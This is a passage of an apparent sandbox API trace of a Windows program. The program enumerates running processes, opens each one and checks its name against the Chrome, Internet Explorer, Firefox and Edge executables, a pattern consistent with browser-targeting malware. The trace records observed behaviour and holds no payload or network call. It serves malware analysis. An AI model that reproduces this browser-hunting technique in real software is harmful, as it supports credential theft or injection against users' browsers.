	[0199.547] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0199.548] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x198c
	[0199.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.548] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0199.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.549] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.549] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0199.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.549] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.549] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0199.550] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1990
	[0199.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.550] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.551] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.551] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.551] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.551] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0199.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1994
	[0199.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.552] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0199.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.552] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.553] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0199.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.553] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.553] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0199.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1998
	[0199.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.554] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0199.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.554] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.555] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0199.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.555] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.555] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0199.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x199c
	[0199.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.556] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0199.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.556] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.557] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0199.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.557] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.557] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0199.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x19a0
	[0199.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.558] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0199.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.558] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.558] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0199.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.559] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.559] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.560] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x19a4
	[0199.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.560] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.560] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.560] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.561] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.561] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x19a8
	[0199.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.562] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.562] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.594] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.595] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.595] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.596] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x19ac
	[0199.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.596] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.596] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.596] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.597] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.597] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.598] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x19b0
	[0199.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.598] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.598] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.598] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.599] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.599] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.600] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x19b4
	[0199.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.600] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.600] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.600] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.601] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.601] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.601] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x19b8
	[0199.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.602] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.602] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.602] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.603] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.603] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.604] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x19bc
	[0199.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.604] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.604] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.604] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.605] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.605] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0199.606] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x19c0
	[0199.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.606] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0199.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.606] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.606] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0199.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.607] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.607] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.608] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x19c4
	[0199.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.608] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.608] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.608] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.609] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.609] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0199.609] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x19c8
	[0199.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.610] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.610] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.610] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.611] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.611] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0199.611] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x19cc
	[0199.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.612] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0199.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.612] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.612] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0199.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.612] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.613] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.613] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x19d0
	[0199.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.613] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.614] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.614] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.614] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.615] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0199.615] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x19d4
	[0199.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.615] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0199.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.616] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.616] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0199.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.616] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.617] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0199.617] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x19d8
	[0199.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.617] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0199.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.618] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.681] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0199.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.681] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.682] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0199.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x19dc
	[0199.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.682] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0199.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.683] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.683] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0199.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.683] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.683] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0199.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x19e0
	[0199.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.684] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0199.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.684] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.685] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0199.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.685] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.685] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0199.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0199.686] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0199.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x19e4
	[0199.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.687] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0199.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.687] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.688] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0199.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.688] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.689] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0199.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x19e8
	[0199.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.690] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0199.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.690] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.690] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0199.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.691] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.691] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0199.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x19ec
	[0199.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.691] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0199.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
